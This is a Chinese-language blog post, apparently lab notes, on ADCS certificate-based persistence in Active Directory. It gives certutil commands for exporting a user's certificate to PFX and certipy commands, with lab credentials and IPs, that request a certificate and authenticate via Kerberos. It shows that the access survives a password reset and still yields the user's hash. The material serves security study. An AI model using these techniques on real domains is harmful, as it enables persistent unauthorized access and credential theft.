ADCS PERSIST1/PERSIST2 用户/机器证书权限维持
前言:ADCS 用户/机器证书权限维持
参考文章:https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf
参考文章:https://cloud.tencent.com/developer/article/2285283
参考文章:https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pkca/4e5fb325-eabc-4fac-a0da-af2b6b4430cb
关于PKINT在kerberos协议中的认证抓包分析
相关的PKINT在kerberos中认证的流程抓包分析可以参考之前写的笔记,参考地址如下所示
参考文章:https://www.cnblogs.com/zpchcbd/p/17495256.html
用户证书权限维持
申请证书
手动申请证书
首先通过certmgr.msc来申请当前域用户aliguai证书,如下图所示
接着查询"个人"中的证书,如下图所示
certutil -user -store My
然后继续导出证书哈希对应的证书pfx信息
certutil -user -exportPFX ece4f2c2641f575f5a7e26a33896ef9adeed4aed C:\Users\aliguai\Desktop\aliguai.pfx
工具申请证书
2024-2-8新增
这边可以直接通过certipy来进行申请用户模板的证书,执行下面这条命令
certipy req -u aliguai@zpchcbd.com -p admin@123 -dc-ip 192.168.75.202 -debug -target-ip 192.168.75.156 -ca adcs -template User
证书认证身份
工具认证身份
这边通过certipy来将aliguai.pfx证书进行kerberos来进行验证,如下图所示
certipy auth -pfx aliguai.pfx -dc-ip 192.168.75.202
权限维持的体现
这边手动在域控上进行修改aliguai的密码,如下图所示
接着继续通过certipy来将aliguai.pfx证书进行kerberos来进行验证,如下图所示,可以看到还是可以获取该用户的哈希值
同样的如果在域控上进行权限维持也是跟上面一样的操作,如下图所示,申请对应的用户模板证书,然后通过证书来进行kerberos认证身份
这边直接通过工具进行申请证书然后进行kerbero认证身份即可
机器证书权限维持
申请证书
工具申请证书
证书认证身份
工具认证身份
自动化攻击收集思路
在一台域机器上可以对用户证书进行搜集,如果存在的话则进行打印。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY